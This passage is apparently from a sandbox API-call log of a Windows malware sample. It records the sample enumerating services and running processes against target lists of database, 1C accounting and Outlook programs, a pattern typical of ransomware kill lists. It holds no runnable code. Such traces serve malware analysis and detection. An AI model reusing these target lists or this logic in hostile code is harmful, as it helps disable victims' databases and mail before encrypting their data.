lpString2="Dhcp") returned 1 [0242.663] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0242.663] lstrlenW (lpString="Dnscache") returned 8 [0242.663] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0242.663] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0242.663] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0242.663] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0242.663] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0242.663] lstrlenW (lpString="eventlog") returned 8 [0242.663] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0242.663] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0242.663] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0242.663] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0242.663] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0242.663] lstrlenW (lpString="EventSystem") returned 11 [0242.663] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0242.663] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0242.663] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0242.663] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0242.663] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0242.663] lstrlenW (lpString="gpsvc") returned 5 [0242.664] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0242.664] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0242.664] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0242.664] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0242.664] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0242.664] lstrlenW (lpString="LanmanWorkstation") returned 17 [0242.664] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0242.664] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0242.664] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0242.664] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0242.664] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0242.664] lstrlenW (lpString="lmhosts") returned 7 [0242.664] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0242.664] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0242.664] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0242.664] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0242.664] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0242.664] lstrlenW (lpString="MMCSS") returned 5 [0242.664] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0242.664] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0242.664] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0242.664] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0242.664] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0242.664] lstrlenW (lpString="MpsSvc") returned 6 [0242.664] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0242.664] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0242.664] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0242.664] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0242.664] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0242.664] lstrlenW (lpString="nsi") returned 3 [0242.665] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0242.665] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0242.665] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0242.665] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0242.665] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0242.665] lstrlenW (lpString="PlugPlay") returned 8 [0242.665] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0242.665] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0242.665] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0242.665] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0242.665] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0242.665] lstrlenW (lpString="Power") returned 5 [0242.665] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0242.665] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0242.665] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0242.665] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0242.665] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0242.665] lstrlenW (lpString="ProfSvc") returned 7 [0242.665] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0242.665] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0242.665] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0242.665] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0242.665] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0242.665] lstrlenW (lpString="RpcEptMapper") returned 12 [0242.665] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0242.665] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0242.665] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0242.665] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0242.665] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0242.665] lstrlenW (lpString="RpcSs") returned 5 [0242.666] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0242.666] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0242.666] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0242.666] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0242.666] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0242.666] lstrlenW (lpString="SamSs") returned 5 [0242.666] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0242.666] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0242.666] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0242.666] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0242.666] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0242.666] lstrlenW (lpString="Schedule") returned 8 [0242.666] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0242.666] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0242.666] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0242.666] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0242.666] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0242.666] lstrlenW (lpString="SENS") returned 4 [0242.666] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0242.666] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0242.666] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0242.666] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0242.666] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0242.666] lstrlenW (lpString="ShellHWDetection") returned 16 [0242.666] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0242.666] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0242.666] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0242.666] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0242.666] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0242.666] lstrlenW (lpString="Spooler") returned 7 [0242.667] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0242.667] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0242.667] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0242.667] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0242.667] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0242.667] lstrlenW (lpString="Themes") returned 6 [0242.667] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0242.667] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0242.667] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0242.667] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0242.667] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0242.667] lstrlenW (lpString="UxSms") returned 5 [0242.667] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0242.667] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0242.667] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0242.667] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0242.667] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0242.667] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0x3dee5b0 | out: hHeap=0xb00000) returned 1 [0242.667] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x240 [0242.668] Process32FirstW (in: hSnapshot=0x240, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0242.669] Process32NextW (in: hSnapshot=0x240, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0242.669] lstrlenW (lpString="System") returned 6 [0242.669] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0242.669] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0242.669] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0242.669] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0242.669] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0242.669] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0242.669] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0242.669] Process32NextW (in: hSnapshot=0x240, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0242.669] lstrlenW (lpString="smss.exe") returned 8 [0242.669] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0242.669] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0242.669] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0242.669] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0242.670] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0242.670] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0242.670] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0242.670] Process32NextW (in: hSnapshot=0x240, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0242.670] lstrlenW (lpString="csrss.exe") returned 9 [0242.670] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0242.670] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0242.670] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0242.670] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0242.670] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0242.670] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0242.670] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0242.670] Process32NextW (in: hSnapshot=0x240, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0242.670] lstrlenW (lpString="wininit.exe") returned 11 [0242.670] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0242.670] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0242.670] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0242.671] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0242.671] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0242.671] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0242.671] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0242.671] Process32NextW (in: hSnapshot=0x240, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x18c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0242.671] lstrlenW (lpString="csrss.exe") returned 9 [0242.671] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0242.671] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0242.671] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0242.671] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0242.671] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0242.671] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0242.671] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0242.671] Process32NextW (in: hSnapshot=0x240, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0242.671] lstrlenW (lpString="winlogon.exe") returned 12 [0242.671] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0242.671] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0242.671] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0242.672] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0242.672] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0242.672] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0242.672] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0242.672] Process32NextW (in: hSnapshot=0x240, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0242.672] lstrlenW (lpString="services.exe") returned 12 [0242.672] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0242.672] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0242.672] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0242.672] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0242.672] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0242.672] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0242.672] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0242.672] Process32NextW (in: hSnapshot=0x240, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x180, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0242.672] lstrlenW (lpString="lsass.exe") returned 9 [0242.672] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0242.672] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0242.672] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0242.673] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0242.673] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0242.673] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0242.673] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0242.673] Process32NextW (in: hSnapshot=0x240, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0242.673] lstrlenW (lpString="lsm.exe") returned 7 [0242.673] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0242.673] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0242.673] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0242.673] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0242.673] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0242.673] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0242.673] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0242.673] Process32NextW (in: hSnapshot=0x240, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.673] lstrlenW (lpString="svchost.exe") returned 11 [0242.673] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0242.673] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0242.673] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0242.673] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0242.674] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0242.674] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0242.674] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0242.674] Process32NextW (in: hSnapshot=0x240, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.674] lstrlenW (lpString="svchost.exe") returned 11 [0242.674] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0242.674] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0242.674] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0242.674] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0242.674] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0242.674] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0242.674] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0242.674] Process32NextW (in: hSnapshot=0x240, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.674] lstrlenW (lpString="svchost.exe") returned 11 [0242.674] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0242.674] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0242.674] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0242.675] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0242.675] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0242.675] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0242.675] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0242.675] Process32NextW (in: hSnapshot=0x240, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1b4, pcPriClassBase=13, dwFlags=0x0, szExeFile="LogonUI.exe")) returned 1 [0242.675] lstrlenW (lpString="LogonUI.exe") returned 11 [0242.675] lstrcmpiW (lpString1="1c8.exe", lpString2="LogonUI.exe") returned -1 [0242.675] lstrcmpiW (lpString1="1cv77.exe", lpString2="LogonUI.exe") returned -1 [0242.675] lstrcmpiW (lpString1="outlook.exe", lpString2="LogonUI.exe") returned 1 [0242.675] lstrcmpiW (lpString1="postgres.exe", lpString2="LogonUI.exe") returned 1 [0242.675] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="LogonUI.exe") returned 1 [0242.675] lstrcmpiW (lpString1="mysqld.exe", lpString2="LogonUI.exe") returned 1 [0242.675] lstrcmpiW (lpString1="sqlservr.exe", lpString2="LogonUI.exe") returned 1 [0242.675] Process32NextW (in: hSnapshot=0x240, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.676] lstrlenW (lpString="svchost.exe") returned 11 [0242.676] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0242.676] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0242.676] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0242.676] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0242.676] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0242.676] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0242.676] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0242.676] Process32NextW (in: hSnapshot=0x240, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.676] lstrlenW (lpString="svchost.exe") returned 11 [0242.676] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0242.676] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0242.676] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0242.676] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0242.676] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0242.676] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0242.676] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0242.676] Process32NextW (in: hSnapshot=0x240, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0242.677] lstrlenW (lpString="audiodg.exe") returned 11 [0242.677] lstrcmpiW (lpString1="1c8.exe", lpString2="audiodg.exe") returned -1 [0242.677] lstrcmpiW (lpString1="1cv77.exe", lpString2="audiodg.exe") returned -1 [0242.677] lstrcmpiW (lpString1="outlook.exe", lpString2="audiodg.exe") returned 1 [0242.677] lstrcmpiW (lpString1="postgres.exe", lpString2="audiodg.exe") returned 1 [0242.677] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="audiodg.exe") returned 1 [0242.677] lstrcmpiW (lpString1="mysqld.exe", lpString2="audiodg.exe") returned 1 [0242.677] lstrcmpiW (lpString1="sqlservr.exe", lpString2="audiodg.exe") returned 1 [0242.677] Process32NextW (in: hSnapshot=0x240, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.677] lstrlenW (lpString="svchost.exe") returned 11 [0242.677] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0242.677] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0242.677] Process32NextW (in: hSnapshot=0x240, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.677] lstrlenW (lpString="svchost.exe") returned 11 [0242.678] Process32NextW (in: hSnapshot=0x240, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0242.678] lstrlenW (lpString="userinit.exe") returned 12 [0242.678] Process32NextW (in: hSnapshot=0x240, lppe=0xa7fd34 | out: 